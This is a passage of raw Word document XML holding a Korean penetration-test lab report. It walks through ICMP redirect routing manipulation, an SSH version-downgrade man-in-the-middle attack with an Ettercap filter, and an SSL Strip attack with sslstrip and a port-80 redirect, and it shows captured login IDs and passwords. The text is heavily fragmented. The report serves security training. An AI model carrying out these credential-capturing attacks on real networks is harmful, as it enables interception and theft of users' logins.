        </w:rPr>
        <w:t>설정에 방향 전환 요청에 체크가 되어 있는지 확인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476C1C" wp14:editId="650B21F2">
            <wp:extent cx="3599815" cy="1714500"/>
            <wp:effectExtent l="0" t="0" r="63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17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2B1D4BB" wp14:editId="4B3ACEA4">
            <wp:extent cx="3599180" cy="1666240"/>
            <wp:effectExtent l="0" t="0" r="127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76" cy="16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hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>B</w:t>
      </w:r>
      <w:r w:rsidRPr="00227DB7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidRPr="00227DB7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>으로 가서 F</w:t>
      </w:r>
      <w:r w:rsidRPr="00227DB7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>orwarding</w:t>
      </w:r>
      <w:r w:rsidRPr="00227DB7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">을 하고 </w:t>
      </w:r>
      <w:r w:rsidRPr="00227DB7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">icmpush </w:t>
      </w:r>
      <w:r w:rsidRPr="00227DB7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>툴을 사용해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F8CD335" wp14:editId="488F5A0A">
            <wp:extent cx="3600000" cy="2358000"/>
            <wp:effectExtent l="0" t="0" r="635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XP 라우팅 테이블 확인 시 BT에서 설정한 내용 적용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46959B91" wp14:editId="747DDA4C">
            <wp:extent cx="3600000" cy="2358000"/>
            <wp:effectExtent l="0" t="0" r="63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확인을 위해 XP에서 8.8.8.8로 Ping tes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뒤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R</w:t>
      </w:r>
      <w:r w:rsidRPr="00227DB7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>outing Table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공격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내용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테이블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추가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것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음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,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BT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acket</w:t>
      </w:r>
      <w:r w:rsidRPr="00227DB7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>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수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공격대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외부에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ing test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2C4967D" wp14:editId="2ACE210A">
            <wp:extent cx="3599726" cy="2651760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BT 와이어샤크로 확인 시 XP가 Ping test하는 것을 볼 수 있음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4" cy="2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80CCB82" wp14:editId="2DE80A7A">
            <wp:extent cx="3599815" cy="2100404"/>
            <wp:effectExtent l="0" t="0" r="63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확인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3" cy="21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BT</w:t>
      </w:r>
      <w:r w:rsidRPr="00227DB7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>으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orwarding</w:t>
      </w:r>
      <w:r w:rsidRPr="00227DB7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>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되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W</w:t>
      </w:r>
      <w:r w:rsidRPr="00227DB7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ire Shark</w:t>
      </w:r>
      <w:r w:rsidRPr="00227DB7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>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했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때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 w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
      <w:r w:rsidRPr="00227DB7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>acket</w:t>
      </w:r>
      <w:r w:rsidRPr="00227DB7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>들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제대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잡히는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</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00227DB7" w:rsidRDefault="00227DB7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227DB7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidRPr="00227DB7">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">SH </w:t>
      </w:r>
      <w:r w:rsidRPr="00227DB7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">취약점 </w:t>
      </w:r>
      <w:r w:rsidRPr="00227DB7">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00227DB7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidRPr="00227DB7">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>SH MITM Attack)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004D52EE" w:rsidRDefault="006A78FE" w:rsidP="004D52EE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6A78FE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidRPr="006A78FE">
        <w:t>SH MITM Attack</w:t>
      </w:r>
      <w:r w:rsidRPr="006A78FE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>이란</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006A78FE" w:rsidRPr="00C44DD4" w:rsidRDefault="000D70E6" w:rsidP="006A78FE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S</w:t>
      </w:r>
      <w:r w:rsidRPr="00C44DD4">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SH</w:t>
      </w:r>
      <w:r w:rsidRPr="00C44DD4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">버전을 </w:t>
      </w:r>
      <w:r w:rsidRPr="00C44DD4">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">1,2 </w:t>
      </w:r>
      <w:r w:rsidRPr="00C44DD4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">동시 지원하는 경우 공격자는 공격 대상과 </w:t>
      </w:r>
      <w:r w:rsidRPr="00C44DD4">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SSH PC</w:t>
      </w:r>
      <w:r w:rsidRPr="00C44DD4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">사이에 중간자가 되어 </w:t>
      </w:r>
      <w:r w:rsidRPr="00C44DD4">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Packet</w:t>
      </w:r>
      <w:r w:rsidRPr="00C44DD4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">을 </w:t>
      </w:r>
      <w:r w:rsidR="00C44DD4" w:rsidRPr="00C44DD4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>가로챔,</w:t>
      </w:r>
      <w:r w:rsidR="00C44DD4" w:rsidRPr="00C44DD4">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0057576B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>가로챈</w:t>
      </w:r>
      <w:r w:rsidR="00C44DD4" w:rsidRPr="00C44DD4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C44DD4" w:rsidRPr="00C44DD4">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Packet</w:t>
      </w:r>
      <w:r w:rsidR="00C44DD4" w:rsidRPr="00C44DD4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>을 변조시켜 S</w:t>
      </w:r>
      <w:r w:rsidR="00C44DD4" w:rsidRPr="00C44DD4">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SH PC</w:t>
      </w:r>
      <w:r w:rsidR="00C44DD4" w:rsidRPr="00C44DD4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">의 응답을 버전1만 지원하는 것처럼 공격 대상에게 보내 버전1로 접근하도록 하는 </w:t>
      </w:r>
      <w:r w:rsidR="00C10F59">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>공격</w:t>
      </w:r>
    </w:p>
    <w:p w:rsid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피해 범위</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C44DD4" w:rsidRP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 w:rsidRPr="00C44DD4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>버전1로 공격 대상이 접근을 하게 되면 S</w:t>
      </w:r>
      <w:r w:rsidRPr="00C44DD4">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SH PC</w:t>
      </w:r>
      <w:r w:rsidRPr="00C44DD4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>의 아이디와 비밀번호로 로그온 한 내용을 갈취해 정보를 얻어올 수 있음</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C44DD4" w:rsidRPr="006A78FE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t>모의 해킹 결과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232194" wp14:editId="1FCBE9EF">
            <wp:extent cx="3600000" cy="2322000"/>
            <wp:effectExtent l="0" t="0" r="635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. 컴파일을 위해 etter.filter.ssh 필터 파일 복사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263E284" wp14:editId="5CF5CEBF">
            <wp:extent cx="3600000" cy="2304000"/>
            <wp:effectExtent l="0" t="0" r="635" b="127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 복사한 필터파일 컴파일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 xml:space="preserve">SSH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협상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버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정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변경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하기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filter</w:t>
      </w:r>
      <w:r w:rsidRPr="00227DB7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>파일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생성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0EAFF3F" wp14:editId="624EE448">
            <wp:extent cx="3600000" cy="2314800"/>
            <wp:effectExtent l="0" t="0" r="63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 경영기획부 PC가 DNS서버로 SSH 접근을 시도 하는 것에 대한 공격 시작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noProof/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Ettercap </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">툴과 만든 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">etter.filter.ssh.co </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">필터 파일을 이용해 경영기획부 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>PC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>에 공격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85A1BE2" wp14:editId="13EC9F72">
            <wp:extent cx="3599815" cy="2794000"/>
            <wp:effectExtent l="0" t="0" r="635" b="635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 경영기획부 PC에서 접근 시도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E55989D" wp14:editId="74CC8A1C">
            <wp:extent cx="3599003" cy="1828800"/>
            <wp:effectExtent l="0" t="0" r="190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 경영기획부 PC에서 DNS서버로 SSH 접근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38" cy="18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6C845FE6" wp14:editId="2D5FEBC6">
            <wp:extent cx="3599010" cy="1600200"/>
            <wp:effectExtent l="0" t="0" r="190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접속 성공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47" cy="1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B7" w:rsidRPr="00227DB7" w:rsidRDefault="00227DB7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227DB7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>공격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확인을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위해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7DB7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>경영기획부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227DB7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>에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227DB7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>서버로</w:t>
      </w:r>
      <w:r w:rsidRPr="00227DB7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227DB7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>접속</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00227DB7" w:rsidRDefault="00227DB7" w:rsidP="00227DB7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2B0350F" wp14:editId="5CF0405D">
            <wp:extent cx="3599815" cy="1912620"/>
            <wp:effectExtent l="0" t="0" r="63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 BT에서 SSH 버전을 다운그레이드 했다는 것을 볼 수 있음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7" cy="1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B4268E3" wp14:editId="1DBEB571">
            <wp:extent cx="3599327" cy="1973580"/>
            <wp:effectExtent l="0" t="0" r="127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 DNS서버에 SSH로 접근할 때 사용한 아이디와 비밀번호도 확인 가능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29" cy="19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BT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해보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버전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운그레이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했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것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있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경영기획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NS</w:t>
      </w:r>
      <w:r w:rsidRPr="00430F0E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>서버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H </w:t>
      </w:r>
      <w:r w:rsidRPr="00430F0E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>접속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했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아이디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비밀번호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가능</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C44DD4" w:rsidRDefault="00C44D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F0E" w:rsidRPr="00C44DD4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2"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C44DD4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidRPr="00C44DD4">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">SL </w:t>
      </w:r>
      <w:r w:rsidRPr="00C44DD4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">취약점 </w:t>
      </w:r>
      <w:r w:rsidRPr="00C44DD4">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00C44DD4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidRPr="00C44DD4">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>SL Strip Attack)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>SL Strip Attack</w:t>
      </w:r>
      <w:r w:rsidRPr="00C44DD4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>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웹 서버와 공격 대상의 중간에서 중간자 상태가 되어 공격자와 공격 대상 사이에는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 xml:space="preserve">로 통신하게끔 유도하고 공격자와 웹 서버 사이에는 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>HTTPS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">로 통신하게끔 유도하는 </w:t>
      </w:r>
      <w:r w:rsidR="00C10F59">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>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와 공격 대상은 서로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로 통신을 하게 되므로 공격 대상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아이디와 패스워드를 갈취할 수 있음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BB6D5D5" wp14:editId="1036264C">
            <wp:extent cx="3600000" cy="316800"/>
            <wp:effectExtent l="0" t="0" r="635" b="762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00. 리다이렉션 확인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188C0AE6" wp14:editId="4F8AE1C9">
            <wp:extent cx="3600000" cy="2592000"/>
            <wp:effectExtent l="0" t="0" r="63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0. 공격 시도 전에 경영기획부 PC에서 접근 시 https로 접근하는 것을 확인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33C44EC" wp14:editId="7A2CF370">
            <wp:extent cx="3599656" cy="1920240"/>
            <wp:effectExtent l="0" t="0" r="1270" b="381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. SSL Strip Attack 을 위해 sslstrip을 받아 압축 해제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56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399172A2" wp14:editId="1BE78659">
            <wp:extent cx="3599322" cy="2164080"/>
            <wp:effectExtent l="0" t="0" r="1270" b="762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 압축해제한 폴더로 이동해서 sslstrip 파일 설치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2" cy="2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LS</w:t>
      </w:r>
      <w:r w:rsidRPr="00430F0E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>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작동하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SSL strip </w:t>
      </w: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slstrip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치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4CEDE2DE" wp14:editId="5D254DFE">
            <wp:extent cx="3599815" cy="3250194"/>
            <wp:effectExtent l="0" t="0" r="635" b="762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. 공격을 위해 경영기획부 PC와 게이트웨이 사이에 MITM 상태 만들기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42" cy="32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99DE83C" wp14:editId="19E32AA7">
            <wp:extent cx="3599815" cy="1940560"/>
            <wp:effectExtent l="0" t="0" r="635" b="254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. 방화벽에 http포트인 80을 sslstrip포트인 10000으로 리다이렉트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9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 w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>G</w:t>
      </w:r>
      <w:r w:rsidRPr="00430F0E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ateway</w:t>
      </w:r>
      <w:r w:rsidRPr="00430F0E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>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개발관리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PC</w:t>
      </w:r>
      <w:r w:rsidRPr="00430F0E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>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MITM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만들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8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시도하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번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R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edirect </w:t>
      </w:r>
      <w:r w:rsidRPr="00430F0E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>시키겠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방화벽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DD436DD" wp14:editId="31499B98">
            <wp:extent cx="3599312" cy="1520983"/>
            <wp:effectExtent l="0" t="0" r="127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. sslstrip 툴을 이용해 공격을 시도 기록은 test.log에 남기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49" cy="15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Sslstrip </w:t>
      </w:r>
      <w:r w:rsidRPr="00430F0E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>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–l </w:t>
      </w:r>
      <w:r w:rsidRPr="00430F0E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>옵션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10000</w:t>
      </w:r>
      <w:r w:rsidRPr="00430F0E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>포트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들어오는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요청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대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http</w:t>
      </w:r>
      <w:r w:rsidRPr="00430F0E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>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접근하도록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설정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58354CB9" wp14:editId="0FCD2768">
            <wp:extent cx="3598246" cy="1566249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 경영기획부 PC에서 소울워커 페이지로 접근을 시도했을 때 https가 아닌 http로 접근하는 것을 확인할 수 있음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5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86C9226" wp14:editId="782FBBDB">
            <wp:extent cx="3598802" cy="1801639"/>
            <wp:effectExtent l="0" t="0" r="1905" b="825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 개발관리부 PC에서 http로 접속되는 것 확인 후 로그인 시도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18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F524B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Cs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CF524B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>개발관리부</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF524B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> PC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웹에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하면</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF524B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> https</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF524B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>가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아닌</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF524B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> http</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF524B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>로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접근하는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것을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확인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 w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>후</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF524B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia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로그온</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF524B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CF524B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>시도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02EB67B0" wp14:editId="1BF56CE2">
            <wp:extent cx="3598265" cy="1674891"/>
            <wp:effectExtent l="0" t="0" r="254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. BT의 와이어샤크로 확인 시 아이디와 비밀번호가 노출됐다는 것을 볼 수 있음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93" cy="16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로그온 시도 후 </w:t>
      </w:r>
      <w:r w:rsidRPr="00430F0E">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>BT</w:t>
      </w:r>
      <w:r w:rsidRPr="00430F0E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">으로 돌아와 와이어 샤크를 확인해보면 아이디와 비밀번호가 노출된 것을 볼 수 있음 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00430F0E" w:rsidRDefault="00430F0E" w:rsidP="00CD0B2D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 xml:space="preserve">NMP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>취약점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S</w:t>
      </w:r>
      <w:r w:rsidRPr="00C44DD4">
        <w:t xml:space="preserve">NMP </w:t>
      </w:r>
      <w:r w:rsidRPr="00C44DD4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>취약점이란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현재 많이 사용하고 있는 S</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>NMP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">버전은 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>v2c</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">를 사용하는데 보안은 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
